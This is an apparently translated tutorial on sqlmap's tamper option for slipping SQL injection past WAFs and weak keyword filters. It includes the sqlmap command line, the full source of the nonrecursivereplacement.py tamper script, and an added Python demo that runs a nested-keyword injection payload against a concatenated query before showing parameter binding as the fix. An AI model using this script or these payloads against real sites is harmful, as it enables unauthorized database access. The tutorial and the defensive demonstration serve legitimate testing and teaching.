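sqlmap's tamper parameter
1. The tamper parameter: to some extent it evades the application's filtering of sensitive characters and gets past WAF blocking.
2. tamper usage: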
sqlmap -u "URL" --level=3 -p "injection parameter" --tamper="xxx.py"
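Note: --tamper is followed by a script name. The sqlmap that ships with Kali includes several dozen tamper scripts, in the directory /usr/share/sqlmap/tamper
3. What the tamper scripts in sqlmap do
There are too many and I can't be bothered to write them all up; for details see "sqlmap tamper scripts: categorized translation reference".
Note: versions from sqlmap 1.2.12 onward no longer include the nonrecursivereplacement.py script. You can download it from an older version on GitHub and put it in the new version's /usr/share/sqlmap/tamper directory, or, since I have copied it below, you can just create a .py file named nonrecursivereplacement.py.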
#!/usr/bin/env python

"""
See the file 'doc/COPYING' for copying permission
"""

import random
import re

# These modules are part of the sqlmap source tree
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    """
    Replaces predefined SQL keywords with representations
    suitable for replacement (e.g. .replace("SELECT", "")) filters

    Notes:
        * Useful to bypass very weak custom filters

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT 2--')
    '1 UNIOUNIONN SELESELECTCT 2--'
    """

    keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")
    retVal = payload

    warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords)
    warnMsg += "You can set it manually according to your needs"
    singleTimeWarnMessage(warnMsg)

    if payload:
        for keyword in keywords:
            # Pick a split point inside the keyword and nest a full copy there
            _ = random.randint(1, len(keyword) - 1)
            retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)

    return retVal
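
Why the single-pass keyword-stripping filter named in the script's docstring gives no protection, and what to use instead, as an added example that is not part of the original post or of sqlmap. The names weak_filter, lookup_concat, lookup_bound and the items table are hypothetical and constructed for illustration; the nested input is the doctest output shown above.

```python
import re
import sqlite3

KEYWORDS = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")

def weak_filter(value):
    """Single-pass keyword stripping, like .replace("SELECT", "") in the docstring."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.I)
    return value

def keywords_survive(value):
    """True if a SQL keyword is still present after weak_filter() has run once."""
    cleaned = weak_filter(value)
    return any(re.search(r"\b%s\b" % kw, cleaned, re.I) for kw in KEYWORDS)

def make_db():
    """Constructed in-memory table used only for this demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [(1, "apple"), (2, "pear")])
    return db

def lookup_concat(db, item_id):
    """'Before': filtered input is still concatenated into the SQL text."""
    sql = "SELECT name FROM items WHERE id = " + weak_filter(item_id)
    return db.execute(sql).fetchall()

def lookup_bound(db, item_id):
    """'After': the value is bound as a parameter and is never parsed as SQL."""
    return db.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchall()

# Constructed sample inputs: the doctest input and the doctest output from above.
PLAIN = "1 UNION SELECT 2--"
NESTED = "1 UNIOUNIONN SELESELECTCT 2--"

if __name__ == "__main__":
    db = make_db()
    print(repr(weak_filter(NESTED)))   # stripping once rebuilds the keywords
    print(lookup_concat(db, NESTED))   # result includes a row not in the table
    print(lookup_bound(db, NESTED))    # bound value matches no id
```

The filter cannot be repaired by adding keywords or looping until nothing changes without also mangling legitimate input; binding parameters removes the need for it.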
